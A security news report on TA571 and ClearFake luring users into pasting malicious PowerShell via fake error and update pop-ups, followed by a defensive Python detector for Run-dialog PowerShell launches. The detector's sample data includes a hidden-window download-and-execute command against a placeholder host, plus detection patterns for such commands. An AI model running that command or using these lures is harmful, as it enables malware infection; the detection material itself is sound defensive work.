18 June 2024

Cybercriminals use new social engineering tactic for running PowerShell and installing malware

A threat actor known as TA571 and the ClearFake activity cluster have been observed employing an innovative social engineering technique designed to manipulate users into executing malicious PowerShell scripts and infecting victim devices with malware.

The technique, detailed by Proofpoint researchers, involves directing users to copy and paste malicious PowerShell scripts that lead to the deployment of various malicious tools, including DarkGate, Matanbuchus, NetSupport, and several information stealers.

Regardless of whether the initial campaign starts via malicious spam (malspam) or web browser injects, the technique follows a similar pattern. Users are presented with a pop-up message displaying an error while trying to open a document or webpage. Instructions are then provided to copy and paste a script into either the PowerShell terminal or the Windows Run dialog box, triggering the execution of the malicious script.

Proofpoint first observed TA571 employing this technique in March 2024, and the ClearFake cluster began using it in early April. ClearFake campaigns involve compromising legitimate websites with malicious HTML and JavaScript, presenting users with fake browser update prompts.

When users visit a compromised site, an injection loads a malicious script hosted on the blockchain via Binance’s Smart Chain contracts—a method known as “EtherHiding.” This script loads a second script from a domain using Keitaro TDS for filtering. If the victim continues to browse the site, they see a fake warning overlay instructing them to install a “root certificate.” Following the instructions leads to executing a PowerShell script.
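As an added defender-side example (not from the Proofpoint research or this article), the following Python flags process-creation events that match the paste-into-the-Run-dialog pattern described above: anything typed into the Run dialog is spawned by explorer.exe, so a PowerShell child of explorer.exe whose command line carries hidden-window, no-profile or download-and-execute switches stands out. The event records and field names are constructed for the demo; the indicator list and the threshold of two hits are assumptions to tune against your own telemetry.

```python
import re
from typing import Dict, List

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# Field names are an assumption; map them to your own log schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -nop -w hidden -c "iex (irm https://example.invalid/fix)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},  # user opened an interactive console: benign
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},  # script job, not from the Run dialog
]

# One point per indicator present in the command line.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_fetch": re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
}


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator names matched by a PowerShell process launched from explorer.exe.

    The Run dialog (Win+R) launches its child under explorer.exe, so that parent is the
    first filter; launches from cmd.exe, schedulers or other parents are ignored here.
    """
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]


def flag_paste_and_run(events: List[Dict[str, str]], threshold: int = 2) -> List[Dict[str, object]]:
    """Collect events whose indicator count reaches the threshold, with the matched indicators."""
    findings = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= threshold:
            findings.append({"cmdline": ev["cmdline"], "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in flag_paste_and_run(SAMPLE_EVENTS):
        print(finding)
```

For triage after the fact, the commands a user entered in the Run dialog are also kept under the RunMRU key of the user's registry hive, which lets an investigator confirm that the flagged command line was pasted by the user rather than launched by a parent script.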
